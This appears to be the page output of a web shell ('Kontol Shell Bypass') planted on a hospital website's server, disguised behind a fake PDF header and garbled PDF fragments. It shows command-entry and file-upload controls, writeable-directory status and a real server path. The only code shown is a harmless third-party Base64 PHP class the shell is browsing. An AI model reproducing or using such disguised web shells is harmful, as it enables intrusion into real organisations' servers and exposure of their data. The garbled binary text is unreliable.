%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/incident/assets/integration/lib/com/wiris/system/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/incident/assets/integration/lib/com/wiris/system/Base64.class.php
<?php

class com_wiris_system_Base64 extends haxe_BaseCode {
	public function __construct() { if(!php_Boot::$skip_constructor) {
		parent::__construct(haxe_io_Bytes::ofString("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
	}}
	public function encodeBytes($bytes) {
		$base64 = parent::encodeBytes($bytes)->toString();
		$remaining = 4 - _hx_mod(strlen($base64), 4);
		while($remaining > 0 && $remaining < 3) {
			$base64 .= "=";
			--$remaining;
		}
		return haxe_io_Bytes::ofString($base64);
	}
	public function decodeBytes($bytes) {
		return haxe_io_Bytes::ofString(base64_decode($bytes->b));
	}
	function __toString() { return 'com.wiris.system.Base64'; }
}

Kontol Shell Bypass